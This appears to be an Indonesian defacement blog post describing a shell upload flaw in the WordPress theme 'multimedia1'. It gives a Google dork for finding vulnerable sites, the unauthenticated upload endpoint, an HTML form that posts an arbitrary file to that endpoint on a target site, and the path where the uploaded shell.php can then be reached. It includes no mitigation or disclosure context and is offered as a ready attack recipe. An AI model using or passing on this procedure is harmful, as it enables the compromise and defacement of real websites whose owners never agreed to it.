Home Deface Wordpress Themes Multimedia1 Shell Upload Vulnerability

Sabtu, 20 Mei 2017

Wordpress Themes Multimedia1 Shell Upload Vulnerability

Diterbitkan
Tags


Dork:
inurl:/wp-content/themes/multimedia1/

Exploit:
wp-content/themes/multimedia1/server/php/

Example:
www.target.co.li/wp-content/themes/multimedia1/server/php/

CRSF:
<html>
<body>
<form enctype="multipart/form-data" action="target.co.li/wp-content/themes/multimedia1/server/php/" method="post">
Your File: <input name="files[]" type="file" /><br />
<input type="submit" value="SIKAT!" />
</form>
</body>
</html>
Lokasi akses shell:
www.target.co.li/wp-content/themes/multimedia1/server/php/files/shell.php

 
 

Artikel Terkait

Jono Irwansyah

Next Post
Previous Post


EmoticonEmoticon

Langganan: Posting Komentar (Atom)